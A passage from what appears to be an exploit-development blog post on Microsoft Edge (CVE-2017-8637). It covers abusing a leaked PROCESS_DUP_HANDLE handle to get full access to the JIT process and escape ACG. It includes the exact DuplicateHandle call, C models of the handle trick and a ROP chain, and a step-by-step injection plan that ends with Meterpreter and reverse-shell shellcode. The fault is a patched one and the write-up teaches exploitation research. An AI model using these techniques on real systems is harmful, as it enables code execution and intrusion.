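In this model, the content process’s own pseudo handle (PROCESS_ALL_ACCESS) satisfies the source side, and the PROCESS_DUP_HANDLE handle stored at s_jitManager+0x8 satisfies the target side. A handle to the JIT server with only, say, PROCESS_QUERY_LIMITED_INFORMATION would not be enough.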

As a side note, this architecture is no longer used; according to Ivan, the issue was fixed as follows:

This issue was fixed by using an undocumented system_handle IDL attribute to transfer the Content Process handle to the JIT Process. This leaves handle passing in the responsibility of the Windows RPC mechanism, so Content Process no longer needs to call DuplicateHandle() or have a handle to the JIT Process.

So, to beat this horse to death, let me concisely reiterate one last time:

  1. JIT process wants to inject JIT’d code into the content process. It needs a handle to the content process to inject this code
  2. In order to fulfill this need, the content process will duplicate its handle and pass it to the JIT server
  3. In order for a duplicated handle from process “A” (the content process) to be used by process “B” (the JIT server), process “B” (the JIT server) first needs to give its handle to process “A” (the content process) with PROCESS_DUP_HANDLE permissions. This is outlined by hTargetProcessHandle which requires “a handle to the process that is to receive the duplicated handle” when the content process calls DuplicateHandle to send its handle to the JIT process
  4. Content process first stores a handle to the JIT server with PROCESS_DUP_HANDLE to fulfill the needs of hTargetProcessHandle
  5. Now that the content process has a PROCESS_DUP_HANDLE to the JIT server, the content process can call DuplicateHandle to duplicate its own handle and pass it to the JIT server
  6. JIT server now has a handle to the content process

The issue with this is step three, as outlined by Microsoft:

A process that has some of the access rights noted here can use them to gain other access rights. For example, if process A has a handle to process B with PROCESS_DUP_HANDLE access, it can duplicate the pseudo handle for process B. This creates a handle that has maximum access to process B. For more information on pseudo handles, see GetCurrentProcess.

What Microsoft is saying here is that if a process has a handle to another process, and that handle has PROCESS_DUP_HANDLE permissions, it is possible to use another call to DuplicateHandle to obtain a full-fledged PROCESS_ALL_ACCESS handle to that other process. This is the exact scenario we currently have: our content process has a PROCESS_DUP_HANDLE handle to the JIT process. As Microsoft points out, this can be dangerous because it is possible to call DuplicateHandle on this PROCESS_DUP_HANDLE handle in order to obtain a full-access handle to the JIT server! This would give us the necessary handle permissions, as we showed earlier with VirtualAllocEx, to compromise the JIT server. CVE-2017-8637 is an ACG bypass because the JIT server doesn’t have ACG enabled! If we, from the content process, can allocate memory and write shellcode into the JIT server (abusing this handle), we would compromise the JIT process and execute code, because ACG isn’t enabled there!
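The following C sketch models why a “low-permission” PROCESS_DUP_HANDLE handle is effectively a full-access one. The access-right constants are the winnt.h values, and the required-rights masks follow the documentation of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread; effective_rights is a hypothetical helper that simply encodes the Microsoft remark quoted above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Process access rights, values from the Windows SDK (winnt.h). */
#define PROCESS_CREATE_THREAD     0x0002u
#define PROCESS_VM_OPERATION      0x0008u
#define PROCESS_VM_READ           0x0010u
#define PROCESS_VM_WRITE          0x0020u
#define PROCESS_DUP_HANDLE        0x0040u
#define PROCESS_QUERY_INFORMATION 0x0400u
#define PROCESS_ALL_ACCESS        0x001FFFFFu

/* Rights each API documents as required on its process handle. */
#define NEEDS_VIRTUALALLOCEX     (PROCESS_VM_OPERATION)
#define NEEDS_WRITEPROCESSMEMORY (PROCESS_VM_WRITE | PROCESS_VM_OPERATION)
#define NEEDS_CREATEREMOTETHREAD (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | \
                                  PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)

static bool has_rights(uint32_t granted, uint32_t required) {
    return (granted & required) == required;
}

/* Hypothetical: what a handle with `granted` rights to process B is really
 * worth. PROCESS_DUP_HANDLE lets the holder duplicate B's pseudo handle,
 * which yields maximum access, modeled here as PROCESS_ALL_ACCESS. */
static uint32_t effective_rights(uint32_t granted) {
    return (granted & PROCESS_DUP_HANDLE) ? PROCESS_ALL_ACCESS : granted;
}
```

On its face the leaked handle cannot even satisfy VirtualAllocEx, but once it is “upgraded” through a second DuplicateHandle call it covers every right the injection APIs ask for.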

So, we could set up a call to DuplicateHandle as such:

DuplicateHandle(
	jitHandle,		// hSourceProcessHandle: leaked from s_jitManager+0x8, PROCESS_DUP_HANDLE to the JIT server
	GetCurrentProcess(),	// hSourceHandle: pseudo handle, interpreted in the context of the source process (the JIT server)
	GetCurrentProcess(),	// hTargetProcessHandle: pseudo handle to the current (content) process, which receives the new handle
	&fulljitHandle,		// lpTargetHandle: variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// dwDesiredAccess: ignored since we specify DUPLICATE_SAME_ACCESS
	FALSE,			// bInheritHandle: handle can't be inherited
	DUPLICATE_SAME_ACCESS	// dwOptions: same permissions as the source handle (a process pseudo handle, so PROCESS_ALL_ACCESS)
);

Let’s talk about where these parameters came from.

  1. hSourceProcessHandle - “A handle to the process with the handle to be duplicated. The handle must have the PROCESS_DUP_HANDLE access right.”
    • The value we are passing here is jitHandle (which represents our PROCESS_DUP_HANDLE to the JIT server). As the parameter description says, we pass in the handle to the process where the “handle we want to duplicate exists”. Since we are passing in the PROCESS_DUP_HANDLE to the JIT server, this essentially tells DuplicateHandle that the handle we want to duplicate exists somewhere within this process (the JIT process).
  2. hSourceHandle - “The handle to be duplicated. This is an open object handle that is valid in the context of the source process.”
    • We supply a value of GetCurrentProcess here, asking DuplicateHandle to duplicate a pseudo handle to the “current process”, in other words a PROCESS_ALL_ACCESS handle. However, since we passed the JIT server as the hSourceProcessHandle parameter, DuplicateHandle interprets this pseudo handle in the context of the JIT process, so the “current process” becomes the JIT process. Normally GetCurrentProcess would refer to the process in which the call occurred (which, in our exploit, will be a ROP chain in the content process). However, we have a “trick” up our sleeve: the leaked handle to the JIT server stored in the content process. By supplying this handle, we “trick” DuplicateHandle into duplicating a PROCESS_ALL_ACCESS handle that exists within the JIT process instead.
  3. hTargetProcessHandle - “A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right.”
    • We supply a value of GetCurrentProcess here. This makes sense, as we want to receive the full handle to the JIT server within the content process. Our exploit executes within the content process, so we tell DuplicateHandle that the process that should receive the handle is the current (content) process, which allows the content process to use it later. Because this pseudo handle carries PROCESS_ALL_ACCESS, it also satisfies the PROCESS_DUP_HANDLE requirement.
  4. lpTargetHandle - “A pointer to a variable that receives the duplicate handle. This handle value is valid in the context of the target process. If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.”
    • This is the most important part. Not only is this the variable that will receive our handle (fulljitHandle just represents a memory address where we want to store this handle; in our exploit we will simply find an unused .data address to store it in), but the second part of the parameter description is equally important. For hSourceHandle we supplied a pseudo handle via GetCurrentProcess, and this description says that DuplicateHandle will convert such a pseudo handle into a real handle. As mentioned, our “trick” is that hSourceProcessHandle is the JIT server while hSourceHandle is a pseudo handle, so we are telling DuplicateHandle to resolve a pseudo handle “to the current process” within the JIT process, which means the JIT process itself. On its own, a pseudo handle is only usable in the context of the process that obtained it: a pseudo handle to the JIT process would only be usable within the JIT process, which is useless to an exploit running in the content process. However, since DuplicateHandle converts the pseudo handle into a real handle, the result is usable by other processes. In other words, our call to DuplicateHandle provides the content process with a real PROCESS_ALL_ACCESS handle to the JIT server.
  5. dwDesiredAccess - “The access requested for the new handle. For the flags that can be specified for each object type, see the following Remarks section. This parameter is ignored if the dwOptions parameter specifies the DUPLICATE_SAME_ACCESS flag…”
    • We will be supplying the DUPLICATE_SAME_ACCESS flag later, meaning we can set this to 0.
  6. bInheritHandle - “A variable that indicates whether the handle is inheritable. If TRUE, the duplicate handle can be inherited by new processes created by the target process. If FALSE, the new handle cannot be inherited.”
    • Here we set the value to FALSE. We don’t need this handle to be inheritable.
  7. dwOptions - “Optional actions. This parameter can be zero, or any combination of the following values.”
    • Here we provide 2, or DUPLICATE_SAME_ACCESS. This instructs DuplicateHandle that we want our duplicate handle to have the same permissions as the source handle. Since we provided a pseudo handle as the source, which has PROCESS_ALL_ACCESS, our final duplicated handle, fulljitHandle, will be a real PROCESS_ALL_ACCESS handle to the JIT server which the content process can use.

If this all sounds confusing, take a few moments to re-read the above. Additionally, here is a summary of what I said:

  1. DuplicateHandle lets you decide in which process the handle you want to duplicate exists. We tell DuplicateHandle that we want to duplicate a handle within the JIT process, using the low-permission PROCESS_DUP_HANDLE handle we have leaked from s_jitManager.
  2. We then tell DuplicateHandle the handle we want to duplicate within the JIT server is a GetCurrentProcess pseudo handle. This handle has PROCESS_ALL_ACCESS
  3. Although GetCurrentProcess returns a handle only usable by the process which called it, DuplicateHandle will perform a conversion under the hood to convert this to an actual handle which other processes can use
  4. Lastly, we tell DuplicateHandle we want a real handle to the JIT server, which we can use from the content process, with PROCESS_ALL_ACCESS permissions via the DUPLICATE_SAME_ACCESS flag which will tell DuplicateHandle to duplicate the handle with the same permissions as the pseudo handle (which is PROCESS_ALL_ACCESS).
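The whole trick can be modeled in a few dozen lines of portable C. This is a toy, not the Windows implementation: handles are indices into per-process tables, the value -1 plays the role of the GetCurrentProcess pseudo handle, and toy_duplicate_handle is a hypothetical stand-in for DuplicateHandle that only models DUPLICATE_SAME_ACCESS. The key line is that hSourceHandle is resolved in the source process’s context, not the caller’s.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define PROCESS_DUP_HANDLE     0x0040u
#define PROCESS_ALL_ACCESS     0x001FFFFFu
#define DUPLICATE_SAME_ACCESS  0x00000002u
#define PSEUDO_CURRENT_PROCESS (-1)   /* GetCurrentProcess() returns (HANDLE)-1 */
#define MAX_HANDLES 8

/* What a handle refers to: a process id plus the access granted. */
typedef struct { int pid; uint32_t access; } HandleEntry;

/* A process with its own private handle table (indices are handle values). */
typedef struct { int pid; HandleEntry table[MAX_HANDLES]; int count; } Process;

/* Interpret handle value h in the context of process p. The pseudo handle
 * always means "p itself, with full access". */
static bool resolve(const Process *p, int h, HandleEntry *out) {
    if (h == PSEUDO_CURRENT_PROCESS) {
        out->pid = p->pid;
        out->access = PROCESS_ALL_ACCESS;
        return true;
    }
    if (h < 0 || h >= p->count) return false;
    *out = p->table[h];
    return true;
}

static Process *find_process(Process *procs, size_t n, int pid) {
    for (size_t i = 0; i < n; i++)
        if (procs[i].pid == pid) return &procs[i];
    return NULL;
}

/* Hypothetical DuplicateHandle stand-in, called from `caller`.
 * hSourceProcess and hTargetProcess are resolved in the caller's table,
 * but hSource is resolved in the SOURCE process's context: that is the
 * trick. dwDesiredAccess and bInheritHandle are not modeled.
 * Returns the new handle value in the target process, or -1 on failure. */
static int toy_duplicate_handle(Process *procs, size_t n, const Process *caller,
                                int hSourceProcess, int hSource,
                                int hTargetProcess, uint32_t options) {
    HandleEntry src_proc, tgt_proc, obj;
    assert(options & DUPLICATE_SAME_ACCESS);   /* only this mode is modeled */
    if (!resolve(caller, hSourceProcess, &src_proc) ||
        !resolve(caller, hTargetProcess, &tgt_proc))
        return -1;
    /* Both process handles must carry PROCESS_DUP_HANDLE. */
    if (!(src_proc.access & PROCESS_DUP_HANDLE) || !(tgt_proc.access & PROCESS_DUP_HANDLE))
        return -1;
    Process *src = find_process(procs, n, src_proc.pid);
    Process *tgt = find_process(procs, n, tgt_proc.pid);
    if (src == NULL || tgt == NULL || tgt->count >= MAX_HANDLES) return -1;
    if (!resolve(src, hSource, &obj)) return -1;
    /* Store a real entry (never a pseudo handle) with the same access. */
    tgt->table[tgt->count] = obj;
    return tgt->count++;
}
```

Called from the content process with hSourceProcess set to the leaked PROCESS_DUP_HANDLE handle, and both hSourceHandle and hTargetProcess set to -1, it stores a new entry for the JIT server with PROCESS_ALL_ACCESS in the content process’s table. Swapping the roles (source = the content process’s pseudo handle, target = the JIT handle) models the legitimate direction described earlier, where the content process hands its own handle to the JIT server.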

Again, just keep re-reading over this and thinking about it logically. If you still have questions, feel free to email me. It can get confusing pretty quickly (at least to me).

Now that we are armed with the above information, it is time to start outlining our exploitation plan.

Exploitation Plan 2.0

Let’s briefly take a second to rehash where we are at:

  1. We have an ASLR bypass and we know the layout of memory
  2. We can read/write anywhere in memory as much or as little as we want
  3. We can direct program execution to wherever we want in memory
  4. We know where the stack is and can force Edge to start executing our ROP chain

However, we know the pesky mitigations of ACG, CIG, and “no child processes” are still in our way. We can’t just execute our payload because we can’t mark our payload as executable. So, with that said, the first option one could take is a pure data-only attack: we could programmatically, via ROP, build out a reverse shell. This is very cumbersome and could take thousands of ROP gadgets. Although this is always a viable alternative, we want to detonate actual shellcode somehow. So, the approach we will take is as follows:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process
  2. ACG is disabled within the JIT process. Use our ability to execute a ROP chain in the content process to write our payload to the JIT process
  3. Execute our payload within the JIT process to obtain shellcode execution (essentially perform process injection to inject a payload to the JIT process where ACG is disabled)

To break down how we will actually accomplish step 2 in even greater detail, let’s first outline some stipulations about processes protected by ACG. We know that the content process (where our exploit will execute) is protected by ACG. We know that the JIT server is not protected by ACG. We already know that a process not protected by ACG is allowed to inject into a process that is protected by ACG. We clearly see this with the out-of-process JIT architecture of Edge. The JIT server (not protected by ACG) injects code into the content process (protected by ACG) - this is expected behavior. However, what about an injection from a process that is protected by ACG into a process that is not protected by ACG (e.g. injection from the content process into the JIT process, which is what we are attempting)?

This is actually prohibited (with a slight caveat). A process that is protected by ACG is not allowed to directly inject RWX memory into, and execute it within, a process not protected by ACG. This makes sense, as this stipulation “protects” against an attacker compromising the JIT process (ACG disabled) from the content process (ACG enabled). The caveat is that the stipulation only prevents us from directly embedding our shellcode as RWX memory and executing it via a process injection call sequence like VirtualAllocEx (allocate RWX memory within the JIT process) -> WriteProcessMemory -> CreateRemoteThread (execute the RWX memory in the JIT process). There is a way we can bypass this stipulation.
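The rule above can be written down as a small plan checker. This C sketch encodes ACG only as this post describes it (a process under ACG may not create or flip memory to executable, in itself or in another process, while plain RW writes are fine); it is a simplification under that assumption, not the kernel’s logic, and Step, step_allowed, and plan_allowed are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* One step of an injection plan, as described in this post. */
typedef struct {
    const char *action;      /* human-readable description of the step */
    bool actor_has_acg;      /* does the process performing the step have ACG? */
    bool makes_executable;   /* does the step create or flip memory to executable? */
} Step;

/* Assumed rule: only a process WITHOUT ACG may make memory executable. */
static bool step_allowed(const Step *s) {
    return !(s->actor_has_acg && s->makes_executable);
}

static bool plan_allowed(const Step *steps, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (!step_allowed(&steps[i])) return false;
    return true;
}
```

With this encoding, the direct VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread sequence is rejected at its first step, whereas steps in which the content process only writes RW data into the JIT process are allowed; memory can only become executable in a step performed by a process without ACG.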

Instead of directly allocating RWX memory within the JIT process (from the content process) we could instead just write a ROP chain into the JIT process. This doesn’t require RWX memory, and only requires RW memory. Then, if we could somehow hijack the control flow of the JIT process, we could have the JIT process execute our ROP chain. Since ACG is disabled in the JIT process, our ROP chain could mark our shellcode as RWX instead of directly doing it via VirtualAllocEx! Essentially, our ROP chain would just be a “traditional” one used to bypass DEP in the JIT process. This would allow us to bypass ACG! This is how our exploit chain would look:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process (this allows us to invoke memory operations on the JIT server from the content process)
  2. Allocate memory within the JIT process via VirtualAllocEx and the above handle
  3. Write our final shellcode (a reflective DLL from Meterpreter) into the allocation (our shellcode is now in the JIT process as RW)
  4. Create a thread within the JIT process via CreateRemoteThread, but create this thread as suspended so it doesn’t execute and have the start/entry point of our thread be a ret ROP gadget
  5. Dump the CONTEXT structure of the thread we just created (and now control) in the JIT process via GetThreadContext to retrieve its stack pointer (RSP)
  6. Use WriteProcessMemory to write the “final” ROP chain into the JIT process by leveraging the leaked stack pointer (RSP) of the thread we control in the JIT process from our call to GetThreadContext. Since we know where the stack is for our thread we created, from GetThreadContext, we can directly write a ROP chain to it with WriteProcessMemory and our handle to the JIT server. This ROP chain will mark our shellcode, which we already injected into the JIT process, as RWX (this ROP chain will work just like any traditional ROP chain that calls VirtualProtect)
  7. Update the instruction pointer of the thread we control to return into our ROP chain
  8. Call ResumeThread. This call will kick off execution of our thread, which has its entry point set to a return routine to start executing off of the stack, where our ROP chain is
  9. Our ROP chain will mark our shellcode as RWX and will jump to it and execute it
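Why does the thread’s entry point only need to be a ret gadget? Because once RIP points at a ret, execution continues at whatever qword sits at RSP, which is exactly where step 6 wrote the chain. The toy interpreter below simulates that flow in portable C. Every address is made up, FAKE_VIRTUALPROTECT merely stands in for VirtualProtect (with rcx, rdx, and r8 carrying lpAddress, dwSize, and flNewProtect as in the x64 calling convention), and shadow space and lpflOldProtect are ignored for brevity.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Made-up addresses standing in for gadgets found in a loaded module. */
enum {
    GADGET_RET          = 0x1000,  /* ret                                   */
    GADGET_POP_RCX      = 0x2000,  /* pop rcx ; ret                         */
    GADGET_POP_RDX      = 0x3000,  /* pop rdx ; ret                         */
    GADGET_POP_R8       = 0x4000,  /* pop r8 ; ret                          */
    FAKE_VIRTUALPROTECT = 0x5000,  /* stands in for kernel32!VirtualProtect */
    SHELLCODE           = 0x6000,  /* injected payload, initially RW        */
};
#define PAGE_EXECUTE_READWRITE 0x40
#define STACK_QWORDS 16

typedef struct {
    uint64_t rip, rcx, rdx, r8;
    size_t rsp;                      /* index into stack[] (one slot = 8 bytes) */
    uint64_t stack[STACK_QWORDS];
    int shellcode_executable;
} Thread;

static uint64_t pop(Thread *t) {
    assert(t->rsp < STACK_QWORDS);
    return t->stack[t->rsp++];
}

/* Steps 6-7: write the chain at the leaked stack pointer of the suspended thread. */
static void write_chain(Thread *t) {
    const uint64_t chain[] = {
        GADGET_POP_RCX, SHELLCODE,               /* lpAddress */
        GADGET_POP_RDX, 0x1000,                  /* dwSize */
        GADGET_POP_R8,  PAGE_EXECUTE_READWRITE,  /* flNewProtect */
        FAKE_VIRTUALPROTECT,                     /* lpflOldProtect (r9) omitted */
        SHELLCODE,                               /* VirtualProtect "returns" here */
    };
    size_t n = sizeof chain / sizeof chain[0];
    assert(t->rsp + n <= STACK_QWORDS);
    for (size_t i = 0; i < n; i++)
        t->stack[t->rsp + i] = chain[i];
}

/* Steps 8-9: "resume" the thread and interpret until the payload is reached.
 * Returns 1 if the payload runs, 0 if it would fault on non-executable
 * memory (DEP), -1 on an unknown address or too many steps. */
static int run(Thread *t, int max_steps) {
    for (int i = 0; i < max_steps; i++) {
        switch (t->rip) {
        case GADGET_RET:     t->rip = pop(t); break;
        case GADGET_POP_RCX: t->rcx = pop(t); t->rip = pop(t); break;
        case GADGET_POP_RDX: t->rdx = pop(t); t->rip = pop(t); break;
        case GADGET_POP_R8:  t->r8  = pop(t); t->rip = pop(t); break;
        case FAKE_VIRTUALPROTECT:
            if (t->rcx == SHELLCODE && t->rdx > 0 && t->r8 == PAGE_EXECUTE_READWRITE)
                t->shellcode_executable = 1;
            t->rip = pop(t);         /* the function's own ret */
            break;
        case SHELLCODE:
            return t->shellcode_executable;
        default:
            return -1;
        }
    }
    return -1;
}
```

A thread that starts on GADGET_RET with this chain on its stack reaches the payload after it has been marked PAGE_EXECUTE_READWRITE, so run returns 1. A thread whose stack simply returns straight into the RW shellcode returns 0, i.e. it would fault under DEP, which is why the VirtualProtect step has to happen inside the JIT process first.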

Lastly, I want to quickly point out the old Advanced Windows Exploitation syllabus from Offensive Security. After reading the steps outlined in this syllabus, I was able to formulate the aforementioned exploitation path from the groundwork laid there. Although the syllabus was succinct and concise, while developing my exploit I learned some additional things about Control Flow Guard checks, which led to many more ROP chains than I would have liked. As this blog post continues, I will explain what I thought would work at first, what actually worked, and how the above exploitation path came to be.

If the above steps seem a bit confusing - do not worry. We will dedicate a section to each concept in the rest of the blog post. You have gotten through a wall of text and, if you have made it to this point, you should have a general understanding of what we are trying to accomplish. Let’s now start implementing this into our exploit. We will start with our shellcode.

Shellcode

The first thing we need to decide is what kind of shellcode we want to execute. What we will do is store our shellcode in the .data section of chakra.dll within the content process. This is so we know its location when it comes time to inject it into the JIT process. So, before we begin our ROP chain, we need to load our shellcode into the content process so we can inject it into the JIT process. A typical example of a reverse shell, on Windows, is as follows:

  1. Create an instance of cmd.exe
  2. Use the socket library of the Windows API to put the I/O for cmd.exe on a socket, making the cmd.exe session remotely accessible over a network connection.

We can see this within the Metasploit Framework

Here is the issue - within Edge, we know there is a “no child processes” mitigation. Since a re